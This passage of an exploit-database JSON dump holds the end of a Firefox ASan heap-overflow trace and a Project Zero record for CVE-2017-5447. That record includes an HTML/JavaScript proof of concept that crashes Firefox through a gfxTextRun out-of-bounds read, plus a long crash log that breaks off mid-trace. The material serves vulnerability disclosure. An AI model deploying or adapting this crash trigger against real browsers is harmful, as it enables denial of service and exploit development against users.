/home/worker/workspace/build/src/layout/svg/nsFilterInstance.cpp:81:19\r\n #25 0x7f8d44d09f72 in nsSVGIntegrationUtils::PaintFilter(nsSVGIntegrationUtils::PaintFramesParams const&) /home/worker/workspace/build/src/layout/svg/nsSVGIntegrationUtils.cpp:1094:5\r\n #26 0x7f8d44f7e9bd in PaintAsLayer 
/home/worker/workspace/build/src/layout/painting/nsDisplayList.cpp:8330:30\r\n #27 0x7f8d44f7e9bd in PaintInactiveLayer /home/worker/workspace/build/src/layout/painting/FrameLayerBuilder.cpp:3722\r\n #28 0x7f8d44f7e9bd in mozilla::FrameLayerBuilder::PaintItems(nsTArray<mozilla::FrameLayerBuilder::ClippedDisplayItem>&, mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&, gfxContext*, nsRenderingContext*, nsDisplayListBuilder*, nsPresContext*, mozilla::gfx::IntPointTyped<mozilla::gfx::UnknownUnits> const&, float, float, int) /home/worker/workspace/build/src/layout/painting/FrameLayerBuilder.cpp:6044\r\n #29 0x7f8d44f819f2 in mozilla::FrameLayerBuilder::DrawPaintedLayer(mozilla::layers::PaintedLayer*, gfxContext*, mozilla::gfx::IntRegionTyped<mozilla::gfx::UnknownUnits> const&, mozilla::gfx::IntRegionTyped<mozilla::gfx::UnknownUnits> const&, mozilla::layers::DrawRegionClip, mozilla::gfx::IntRegionTyped<mozilla::gfx::UnknownUnits> const&, void*) /home/worker/workspace/build/src/layout/painting/FrameLayerBuilder.cpp:6233:19\r\n #30 0x7f8d40034966 in mozilla::layers::ClientPaintedLayer::PaintThebes(nsTArray<mozilla::layers::ReadbackProcessor::Update>*) /home/worker/workspace/build/src/gfx/layers/client/ClientPaintedLayer.cpp:85:5\r\n #31 0x7f8d40035611 in mozilla::layers::ClientPaintedLayer::RenderLayerWithReadback(mozilla::layers::ReadbackProcessor*) /home/worker/workspace/build/src/gfx/layers/client/ClientPaintedLayer.cpp:139:3\r\n #32 0x7f8d4006810f in mozilla::layers::ClientContainerLayer::RenderLayer() /home/worker/workspace/build/src/gfx/layers/client/ClientContainerLayer.h:57:29\r\n \r\nSUMMARY: AddressSanitizer: heap-buffer-overflow /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:2293:10 in ColorComponentAtPoint\r\nShadow bytes around the buggy address:\r\n 0x0ff21a520c10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x0ff21a520c20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x0ff21a520c30: fa fa fa fa fa fa fa fa fa fa fa 
fa fa fa fa fa\r\n 0x0ff21a520c40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x0ff21a520c50: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n=>0x0ff21a520c60: fa fa fa fa fa fa[fa]fa fa fa fa fa fa fa fa fa\r\n 0x0ff21a520c70: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x0ff21a520c80: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x0ff21a520c90: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x0ff21a520ca0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x0ff21a520cb0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\nShadow byte legend (one shadow byte represents 8 application bytes):\r\n Addressable: 00\r\n Partially addressable: 01 02 03 04 05 06 07 \r\n Heap left redzone: fa\r\n Heap right redzone: fb\r\n Freed heap region: fd\r\n Stack left redzone: f1\r\n Stack mid redzone: f2\r\n Stack right redzone: f3\r\n Stack partial redzone: f4\r\n Stack after return: f5\r\n Stack use after scope: f8\r\n Global redzone: f9\r\n Global init order: f6\r\n Poisoned by user: f7\r\n Container overflow: fc\r\n Array cookie: ac\r\n Intra object redzone: bb\r\n ASan internal: fe\r\n Left alloca redzone: ca\r\n Right alloca redzone: cb\r\n==25524==ABORTING\r\n-->\n\n# 0day.today [2018-04-03] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/27839"}, {"lastseen": "2018-02-20T03:24:07", "references": [], "description": "Exploit for multiple platform in category dos / poc", "edition": 1, "reporter": "Google Security Research", "published": "2017-05-25T00:00:00", "title": "Mozilla Firefox < 53 - gfxTextRun Out-of-Bounds Read Exploit", "type": "zdt", "enchantments": {"score": {"modified": "2018-02-20T03:24:07", "vector": "AV:N/AC:M/Au:M/C:N/I:N/A:P/", "value": 2.8}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2017-5447"], "modified": "2017-05-25T00:00:00", "id": "1337DAY-ID-27840", "href": "https://0day.today/exploit/description/27840", "sourceData": "<!--\r\nSource: 
https://bugs.chromium.org/p/project-zero/issues/detail?id=1160\r\n \r\nMozilla bug tracker link: https://bugzilla.mozilla.org/show_bug.cgi?id=1343552\r\n \r\nThere is an out-of-bounds read vulnerability in Firefox. The vulnerability was confirmed on the nightly ASan build. \r\n \r\nPoC:\r\n \r\n=================================================================\r\n-->\r\n \r\n<style>\r\n.class1 { float: left; white-space: pre-line; }\r\n.class2 { border-bottom-style: solid; font-face: Arial; font-size: 7ex; }\r\n</style>\r\n<script>\r\nfunction go() {\r\n menuitem.appendChild(document.body.firstChild);\r\n canvas.toBlob(callback);\r\n}\r\nfunction callback() {\r\n var s = menu.style;\r\n s.setProperty(\"flex-direction\", \"row-reverse\");\r\n option.scrollBy();\r\n document.implementation.createHTMLDocument(\"foo\").adoptNode(progress);\r\n s.setProperty(\"flex-direction\", \"column\");\r\n canvas.toBlob(callback);\r\n}\r\n</script>\r\naaaaaaaaaaaaaaaaaa\r\n</head>\r\n<body onload=go()>\r\n<del class=\"class1\">\r\n<span class=\"class2\">\r\n<menu id=\"menu\">\r\n<menuitem>\r\n</menu>\r\n<menuitem id=\"menuitem\">\r\n<progress id=\"progress\">\r\n</del>\r\n<ol dir=\"rtl\">l+0</ol>\r\n<canvas id=\"canvas\">\r\n<option id=\"option\">\r\n \r\n<!--\r\n=================================================================\r\n \r\nASan log:\r\n \r\n=================================================================\r\n==104545==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x611000721ecc at pc 0x7fcef25af0e8 bp 0x7ffc23afd1b0 sp 0x7ffc23afd1a8\r\nREAD of size 4 at 0x611000721ecc thread T0\r\n #0 0x7fcef25af0e7 in IsSimpleGlyph /home/worker/workspace/build/src/gfx/thebes/gfxFont.h:785:46\r\n #1 0x7fcef25af0e7 in GetAdvanceForGlyph /home/worker/workspace/build/src/gfx/thebes/gfxTextRun.h:638\r\n #2 0x7fcef25af0e7 in GetAdvanceForGlyphs /home/worker/workspace/build/src/gfx/thebes/gfxTextRun.cpp:334\r\n #3 0x7fcef25af0e7 in gfxTextRun::GetAdvanceWidth(gfxTextRun::Range, 
gfxTextRun::PropertyProvider*, gfxFont::Spacing*) const /home/worker/workspace/build/src/gfx/thebes/gfxTextRun.cpp:1074\r\n #4 0x7fcef704ac7c in nsTextFrame::TrimTrailingWhiteSpace(mozilla::gfx::DrawTarget*) /home/worker/workspace/build/src/layout/generic/nsTextFrame.cpp:9654:15\r\n #5 0x7fcef6d2a2ef in nsLineLayout::TrimTrailingWhiteSpaceIn(nsLineLayout::PerSpanData*, int*) /home/worker/workspace/build/src/layout/generic/nsLineLayout.cpp:2584:44\r\n #6 0x7fcef6d2a1c7 in nsLineLayout::TrimTrailingWhiteSpaceIn(nsLineLayout::PerSpanData*, int*) /home/worker/workspace/build/src/layout/generic/nsLineLayout.cpp:2531:11\r\n #7 0x7fcef6d2a1c7 in nsLineLayout::TrimTrailingWhiteSpaceIn(nsLineLayout::PerSpanData*, int*) /home/worker/workspace/build/src/layout/generic/nsLineLayout.cpp:2531:11\r\n #8 0x7fcef6d2b293 in nsLineLayout::TrimTrailingWhiteSpace() /home/worker/workspace/build/src/layout/generic/nsLineLayout.cpp:2654:3\r\n #9 0x7fcef6dcc03b in nsBlockFrame::PlaceLine(mozilla::BlockReflowInput&, nsLineLayout&, nsLineList_iterator, nsFloatManager::SavedState*, mozilla::LogicalRect&, int&, bool*) /home/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:4479:3\r\n #10 0x7fcef6dcabe3 in nsBlockFrame::DoReflowInlineFrames(mozilla::BlockReflowInput&, nsLineLayout&, nsLineList_iterator, nsFlowAreaRect&, int&, nsFloatManager::SavedState*, bool*, LineReflowStatus*, bool) /home/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:4082:12\r\n #11 0x7fcef6dc0d6c in nsBlockFrame::ReflowInlineFrames(mozilla::BlockReflowInput&, nsLineList_iterator, bool*) /home/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:3828:9\r\n #12 0x7fcef6dafacf in ReflowLine /home/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:2834:5\r\n #13 0x7fcef6dafacf in nsBlockFrame::ReflowDirtyLines(mozilla::BlockReflowInput&) /home/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:2370\r\n #14 0x7fcef6da5c1a in nsBlockFrame::Reflow(nsPresContext*, mozilla::ReflowOutput&, 
mozilla::ReflowInput const&, nsReflowStatus&) /home/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:1237:3\r\n #15 0x7fcef6dc6e8d in nsBlockReflowContext::ReflowBlock(mozilla::LogicalRect const&, bool, nsCollapsingMargin&, int, bool, nsLineBox*, mozilla::ReflowInput&, nsReflowStatus&, mozilla::BlockReflowInput&) /home/worker/workspace/build/src/layout/generic/nsBlockReflowContext.cpp:306:3\r\n #16 0x7fcef6dd9001 in nsBlockFrame::ReflowFloat(mozilla::BlockReflowInput&, mozilla::LogicalRect const&, nsIFrame*, mozilla::LogicalMargin&, mozilla::LogicalMargin&, bool, nsReflowStatus&) /home/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:6272:5\r\n #17 0x7fcef6d4d19f in mozilla::BlockReflowInput::FlowAndPlaceFloat(nsIFrame*) /home/worker/workspace/build/src/layout/generic/BlockReflowInput.cpp:910:5\r\n #18 0x7fcef6d4b143 in mozilla::BlockReflowInput::AddFloat(nsLineLayout*, nsIFrame*, int) /home/worker/workspace/build/src/layout/generic/BlockReflowInput.cpp:627:14\r\n #19 0x7fcef6d21369 in AddFloat /home/worker/workspace/build/src/layout/generic/nsLineLayout.h:190:12\r\n #20 0x7fcef6d21369 in nsLineLayout::ReflowFrame(nsIFrame*, nsReflowStatus&, mozilla::ReflowOutput*, bool&) /home/worker/workspace/build/src/layout/generic/nsLineLayout.cpp:979\r\n #21 0x7fcef6dcb7bb in nsBlockFrame::ReflowInlineFrame(mozilla::BlockReflowInput&, nsLineLayout&, nsLineList_iterator, nsIFrame*, LineReflowStatus*) /home/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:4153:3\r\n #22 0x7fcef6dca446 in nsBlockFrame::DoReflowInlineFrames(mozilla::BlockReflowInput&, nsLineLayout&, nsLineList_iterator, nsFlowAreaRect&, int&, nsFloatManager::SavedState*, bool*, LineReflowStatus*, bool) /home/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:3954:5\r\n #23 0x7fcef6dc0d6c in nsBlockFrame::ReflowInlineFrames(mozilla::BlockReflowInput&, nsLineList_iterator, bool*) /home/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:3828:9\r\n #24 0x7fcef6dafacf in 
ReflowLine /home/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:2834:5\r\n #25 0x7fcef6dafacf in nsBlockFrame::ReflowDirtyLines(mozilla::BlockReflowInput&) /home/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:2370\r\n #26 0x7fcef6da5c1a in nsBlockFrame::Reflow(nsPresContext*, mozilla::ReflowOutput&, mozilla::ReflowInput const&, nsReflowStatus&) /home/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:1237:3\r\n #27 0x7fcef6dc6e8d in nsBlockReflowContext::ReflowBlock(mozilla::LogicalRect const&, bool, nsCollapsingMargin&, int, bool, nsLineBox*, mozilla::ReflowInput&, nsReflowStatus&, mozilla::BlockReflowInput&) /home/worker/workspace/build/src/layout/generic/nsBlockReflowContext.cpp:306:3\r\n #28 0x7fcef6dbc4da in nsBlockFrame::ReflowBlockFrame(mozilla::BlockReflowInput&, nsLineList_iterator, bool*) /home/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:3462:7\r\n #29 0x7fcef6dafafa in ReflowLine /home/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:2831:5\r\n #30 0x7fcef6dafafa in nsBlockFrame::ReflowDirtyLines(mozilla::BlockReflowInput&) /home/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:2370\r\n #31 0x7fcef6da5c1a in nsBlockFrame::Reflow(nsPresContext*, mozilla::ReflowOutput&, mozilla::ReflowInput const&, nsReflowStatus&) /home/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:1237:3\r\n #32 0x7fcef6e0ada0 in nsContainerFrame::ReflowChild(nsIFrame*, nsPresContext*, mozilla::ReflowOutput&, mozilla::ReflowInput const&, mozilla::WritingMode const&, mozilla::LogicalPoint const&, nsSize const&, unsigned int, nsReflowStatus&, nsOverflowContinuationTracker*) /home/worker/workspace/build/src/layout/generic/nsContainerFrame.cpp:1028:3\r\n #33 0x7fcef6e09555 in nsCanvasFrame::Reflow(nsPresContext*, mozilla::ReflowOutput&, mozilla::ReflowInput const&, nsReflowStatus&) /home/worker/workspace/build/src/layout/generic/nsCanvasFrame.cpp:711:5\r\n #34 0x7fcef6e0ada0 in 
nsContainerFrame::ReflowChild(nsIFrame*, nsPresContext*, mozilla::ReflowOutput&, mozilla::ReflowInput const&, mozilla::WritingMode const&, mozilla::LogicalPoint const&, nsSize const&, unsigned int, nsReflowStatus&, nsOverflowContinuationTracker*) /home/worker/workspace/build/src/layout/generic/nsContainerFrame.cpp:1028:3\r\n #35 0x7fcef6eb0394 in nsHTMLScrollFrame::ReflowScrolledFrame(mozilla::ScrollReflowInput*, bool, bool, mozilla::ReflowOutput*, bool) /home/worker/workspace/build/src/layout/generic/nsGfxScrollFrame.cpp:552:3\r\n #36 0x7fcef6eb1840 in nsHTMLScrollFrame::ReflowContents(mozilla::ScrollReflowInput*, mozilla::ReflowOutput const&) /home/worker/workspace/build/src/layout/generic/nsGfxScrollFrame.cpp:664:3\r\n #37 0x7fcef6eb5073 in nsHTMLScrollFrame::Reflow(nsPresContext*, mozilla::ReflowOutput&, mozilla::ReflowInput const&, nsReflowStatus&) /home/worker/workspace/build/src/layout/generic/nsGfxScrollFrame.cpp:1039:3\r\n #38 0x7fcef6e1b964 in nsContainerFrame::ReflowChild(nsIFrame*, nsPresContext*, mozilla::ReflowOutput&, mozilla::ReflowInput const&, int, int, unsigned int, nsReflowStatus&, nsOverflowContinuationTracker*) /home/worker/workspace/build/src/layout/generic/nsContainerFrame.cpp:1072:3\r\n #39 0x7fcef6d8b760 in mozilla::ViewportFrame::Reflow(nsPresContext*, mozilla::ReflowOutput&, mozilla::ReflowInput const&, nsReflowStatus&) /home/worker/workspace/build/src/layout/generic/ViewportFrame.cpp:326:7\r\n #40 0x7fcef6b89187 in mozilla::PresShell::DoReflow(nsIFrame*, bool) /home/worker/workspace/build/src/layout/base/PresShell.cpp:9202:3\r\n #41 0x7fcef6b9cde4 in mozilla::PresShell::ProcessReflowCommands(bool) /home/worker/workspace/build/src/layout/base/PresShell.cpp:9375:24\r\n #42 0x7fcef6b9bcf6 in mozilla::PresShell::DoFlushPendingNotifications(mozilla::ChangesToFlush) /home/worker/workspace/build/src/layout/base/PresShell.cpp:4174:11\r\n #43 0x7fcef2c4646e in FlushPendingNotifications 
/home/worker/workspace/build/src/obj-firefox/dist/include/nsIPresShell.h:598:5\r\n #44 0x7fcef2c4646e in nsDocument::FlushPendingNotifications(mozilla::FlushType) /home/worker/workspace/build/src/dom/base/nsDocument.cpp:7961\r\n #45 0x7fcef2a1f2b4 in GetPrimaryFrame /home/worker/workspace/build/src/dom/base/Element.cpp:2164:5\r\n #46 0x7fcef2a1f2b4 in mozilla::dom::Element::GetScrollFrame(nsIFrame**, bool) /home/worker/workspace/build/src/dom/base/Element.cpp:637\r\n #47 0x7fcef2a20871 in mozilla::dom::Element::ScrollBy(mozilla::dom::ScrollToOptions const&) /home/worker/workspace/build/src/dom/base/Element.cpp:794:28\r\n #48 0x7fcef4112002 in mozilla::dom::ElementBinding::scrollBy(JSContext*, JS::Handle<JSObject*>, mozilla::dom::Element*, JSJitMethodCallArgs const&) /home/worker/workspace/build/src/obj-firefox/dom/bindings/ElementBinding.cpp:2492:7\r\n #49 0x7fcef45cdd27 in mozilla::dom::GenericBindingMethod(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:2953:13\r\n #50 0x7fcefa0cc04f in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:282:15\r\n #51 0x7fcefa0cc04f in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:448\r\n #52 0x7fcefa0b2970 in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:499:12\r\n #53 0x7fcefa0b2970 in Interpret(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2955\r\n #54 0x7fcefa097c9b in js::RunScript(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:394:12\r\n #55 0x7fcefa0cc366 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:466:15\r\n #56 0x7fcefa0cca42 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) 
/home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:512:10\r\n #57 0x7fcefaa9cd1c in JS::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/jsapi.cpp:2878:12\r\n #58 0x7fcef4242c05 in mozilla::dom::BlobCallback::Call(JSContext*, JS::Handle<JS::Value>, mozilla::dom::Blob*, mozilla::ErrorResult&) /home/worker/workspace/build/src/obj-firefox/dom/bindings/HTMLCanvasElementBinding.cpp:81:8\r\n #59 0x7fcef475613f in Call /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/HTMLCanvasElementBinding.h:180:12\r\n #60 0x7fcef475613f in mozilla::dom::CanvasRenderingContextHelper::ToBlob(JSContext*, nsIGlobalObject*, mozilla::dom::BlobCallback&, nsAString_internal const&, JS::Handle<JS::Value>, mozilla::ErrorResult&)::EncodeCallback::ReceiveBlob(already_AddRefed<mozilla::dom::Blob>) /home/worker/workspace/build/src/dom/canvas/CanvasRenderingContextHelper.cpp:56\r\n #61 0x7fcef2acde86 in mozilla::dom::EncodingCompleteEvent::Run() /home/worker/workspace/build/src/dom/base/ImageEncoder.cpp:105:12\r\n #62 0x7fcef0217012 in nsThread::ProcessNextEvent(bool, bool*) /home/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1264:7\r\n #63 0x7fcef02138c0 in NS_ProcessNextEvent(nsIThread*, bool) /home/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:389:10\r\n #64 0x7fcef10322bf in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /home/worker/workspace/build/src/ipc/glue/MessagePump.cpp:96:21\r\n #65 0x7fcef0fa3658 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:238:3\r\n #66 0x7fcef0fa3658 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:231\r\n #67 0x7fcef0fa3658 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:211\r\n #68 0x7fcef63ffdbf in nsBaseAppShell::Run() 
/home/worker/workspace/build/src/widget/nsBaseAppShell.cpp:156:3\r\n #69 0x7fcef9a88d81 in nsAppStartup::Run() /home/worker/workspace/build/src/toolkit/components/startup/nsAppStartup.cpp:283:19\r\n #70 0x7fcef9c5243c in XREMain::XRE_mainRun() /home/worker/workspace/build/src/toolkit/xre/nsAppRunner.cpp:4476:10\r\n #71 0x7fcef9c53f38 in XREMain::XRE_main(int, char**, mozilla::BootstrapConfig const&) /home/worker/workspace/build/src/toolkit/xre/nsAppRunner.cpp:4654:8\r\n #72 0x7fcef9c551fc in XRE_main(int, char**, mozilla::BootstrapConfig const&) /home/worker/workspace/build/src/toolkit/xre/nsAppRunner.cpp:4745:16\r\n #73 0x4dffaf in do_main /home/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:237:10\r\n #74 0x4dffaf in main /home/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:308\r\n #75 0x7fcf0b63282f in __libc_start_main /build/glibc-t3gR2i/glibc-2.23/csu/../csu/libc-start.c:291\r\n #76 0x41c3d8 in _start (/home/ifratric/p0/latest/firefox/firefox+0x41c3d8)\r\n \r\n0x611000721ecc is located 0 bytes to the right of 204-byte region [0x611000721e00,0x611000721ecc)\r\nallocated by thread T0 here:\r\n #0 0x4b2e4b in malloc /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:52:3\r\n #1 0x7fcef25b9900 in AllocateStorageForTextRun /home/worker/workspace/build/src/gfx/thebes/gfxTextRun.cpp:122:21\r\n #2 0x7fcef25b9900 in Create /home/worker/workspace/build/src/gfx/thebes/gfxTextRun.cpp:139\r\n #3 0x7fcef25b9900 in gfxFontGroup::MakeTextRun(unsigned char const*, unsigned int, gfxTextRunFactory::Parameters const*, unsigned int, gfxMissingFontRecorder*) /home/worker/workspace/build/src/gfx/thebes/gfxTextRun.cpp:2075\r\n #4 0x7fcef6ff6f49 in BuildTextRunsScanner::BuildTextRunForFrames(void*) /home/worker/workspace/build/src/layout/generic/nsTextFrame.cpp:2394:17\r\n #5 0x7fcef6fefe0b in BuildTextRunsScanner::FlushFrames(bool, bool) /home/worker/workspace/build/src/layout/generic/nsTextFrame.cpp:1633:17\r\n #6 
0x7fcef6ffb09d in BuildTextRunsScanner::ScanFrame(nsIFrame*) /home/worker/workspace/build/src/layout/generic/nsTextFrame.cpp:1902:9\r\n #7 0x7fcef6ffb72f in BuildTextRunsScanner::ScanFrame(nsIFrame*) /home/worker/workspace/build/src/layout/generic/nsTextFrame.cpp:1942:5\r\n #8 0x7fcef6ffb72f in BuildTextRunsScanner::ScanFrame(nsIFrame*) /home/worker/workspace/build/src/layout/generic/nsTextFrame.cpp:1942:5\r\n #9 0x7fcef7003a8a in BuildTextRuns /home/worker/workspace/build/src/layout/generic/nsTextFrame.cpp:1534:7\r\n #10 0x7fcef7003a8a in nsTextFrame::EnsureTextRun(nsTextFrame::TextRunType, mozilla::gfx::DrawTarget*, nsIFrame*, nsLineList_iterator const*, unsigned int*) /home/worker/workspace/build/src/layout/generic/nsTextFrame.cpp:2860\r\n #11 0x7fcef703d429 in nsTextFrame::AddInlineMinISizeForFlow(nsRenderingContext*, nsIFrame::InlineMinISizeData*, nsTextFrame::TextRunType) /home/worker/workspace/build/src/layout/generic/nsTextFrame.cpp:8329:5\r\n #12 0x7fcef70405ef in nsTextFrame::AddInlineMinISize(nsRenderingContext*, nsIFrame::InlineMinISizeData*) /home/worker/workspace/build/src/layout/generic/nsTextFrame.cpp:8499:7\r\n #13 0x7fcef6e1a982 in nsContainerFrame::DoInlineIntrinsicISize(nsRenderingContext*, nsIFrame::InlineIntrinsicISizeData*, nsLayoutUtils::IntrinsicISizeType) /home/worker/workspace/build/src/layout/generic/nsContainerFrame.cpp:897:9\r\n #14 0x7fcef6e1a982 in nsContainerFrame::DoInlineIntrinsicISize(nsRenderingContext*, nsIFrame::InlineIntrinsicISizeData*, nsLayoutUtils::IntrinsicISizeType) /home/worker/workspace/build/src/layout/generic/nsContainerFrame.cpp:897:9\r\n #15 0x7fcef6d9f622 in nsBlockFrame::GetMinISize(nsRenderingContext*) /home/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:774:11\r\n #16 0x7fcef6e1b150 in ShrinkWidthToFit /home/worker/workspace/build/src/layout/generic/nsFrame.cpp:5566:22\r\n #17 0x7fcef6e1b150 in nsContainerFrame::ComputeAutoSize(nsRenderingContext*, mozilla::WritingMode, mozilla::LogicalSize const&, 
int, mozilla::LogicalSize const&, mozilla::LogicalSize const&, mozilla::LogicalSize const&, nsIFrame::ComputeSizeFlags) /home/worker/workspace/build/src/layout/generic/nsContainerFrame.cpp:942\r\n #18 0x7fcef6e2260e in nsFrame::ComputeSize(nsRenderingContext*, mozilla::WritingMode, mozilla::LogicalSize const&, int, mozilla::LogicalSize const&, mozilla::LogicalSize const&, mozilla::LogicalSize const&, nsIFrame::ComputeSizeFlags) /home/worker/workspace/build/src/layout/generic/nsFrame.cpp:4822:24\r\n #19 0x7fcef6d4fb36 in FloatMarginISize(mozilla::ReflowInput const&, int, nsIFrame*, mozilla::SizeComputationInput const&) /home/worker/workspace/build/src/layout/generic/BlockReflowInput.cpp:692:5\r\n #20 0x7fcef6d4c21f in mozilla::BlockReflowInput::FlowAndPlaceFloat(nsIFrame*) /home/worker/workspace/build/src/layout/generic/BlockReflowInput.cpp:757:30\r\n #21 0x7fcef6d4b143 in mozilla::BlockReflowInput::AddFloat(nsLineLayout*, nsIFrame*, int) /home/worker/workspace/build/src/layout/generic/BlockReflowInput.cpp:627:14\r\n #22 0x7fcef6d21369 in AddFloat /home/worker/workspace/build/src/layout/generic/nsLineLayout.h:190:12\r\n #23 0x7fcef6d21369 in nsLineLayout::ReflowFrame(nsIFrame*, nsReflowStatus&, mozilla::ReflowOutput*, bool&) /home/worker/workspace/build/src/layout/generic/nsLineLayout.cpp:979\r\n #24 0x7fcef6dcb7bb in nsBlockFrame::ReflowInlineFrame(mozilla::BlockReflowInput&, nsLineLayout&, nsLineList_iterator, nsIFrame*, LineReflowStatus*) /home/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:4153:3\r\n #25 0x7fcef6dca446 in nsBlockFrame::DoReflowInlineFrames(mozilla::BlockReflowInput&, nsLineLayout&, nsLineList_iterator, nsFlowAreaRect&, int&, nsFloatManager::SavedState*, bool*, LineReflowStatus*, bool) /home/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:3954:5\r\n #26 0x7fcef6dc0d6c in nsBlockFrame::ReflowInlineFrames(mozilla::BlockReflowInput&, nsLineList_iterator, bool*) 
/home/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:3828:9\r\n #27 0x7fcef6dafacf in ReflowLine /home/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:2834:5\r\n #28 0x7fcef6dafacf in nsBlockFrame::ReflowDirtyLines(mozilla::BlockReflowInput&) /home/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:2370\r\n #29 0x7fcef6da5c1a in nsBlockFrame::Reflow(nsPresContext*, mozilla::ReflowOutput&, mozilla::ReflowInput const&, nsReflowStatus&) /home/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:1237:3\r\n #30 0x7fcef6dc6e8d in nsBlockReflowContext::ReflowBlock(mozilla::LogicalRect const&, bool, nsCollapsingMargin&, int, bool, nsLineBox*, mozilla::ReflowInput&, nsReflowStatus&, mozilla::BlockReflowInput&) /home/worker/workspace/build/src/layout/generic/nsBlockReflowContext.cpp:306:3\r\n #31 0x7fcef6dbc4da in nsBlockFrame::ReflowBlockFrame(mozilla::BlockReflowInput&, nsLineList_iterator, bool*) /home/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:3462:7\r\n #32 0x7fcef6dafafa in ReflowLine /home/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:2831:5\r\n #33 0x7fcef6dafafa in nsBlockFrame::ReflowDirtyLines(mozilla::BlockReflowInput&) /home/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:2370\r\n #34 0x7fcef6da5c1a in nsBlockFrame::Reflow(nsPresContext*, mozilla::ReflowOutput&, mozilla::ReflowInput const&, nsReflowStatus&) /home/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:1237:3\r\n #35 0x7fcef6e0ada0 in nsContainerFrame::ReflowChild(nsIFrame*, nsPresContext*, mozilla::ReflowOutput&, mozilla::ReflowInput const&, mozilla::WritingMode const&, mozilla::LogicalPoint const&, nsSize const&, unsigned int, nsReflowStatus&, nsOverflowContinuationTracker*) /home/worker/workspace/build/src/layout/generic/nsContainerFrame.cpp:1028:3\r\n #36 0x7fcef6e09555 in nsCanvasFrame::Reflow(nsPresContext*, mozilla::ReflowOutput&, mozilla::ReflowInput const&, nsReflowStatus&) 
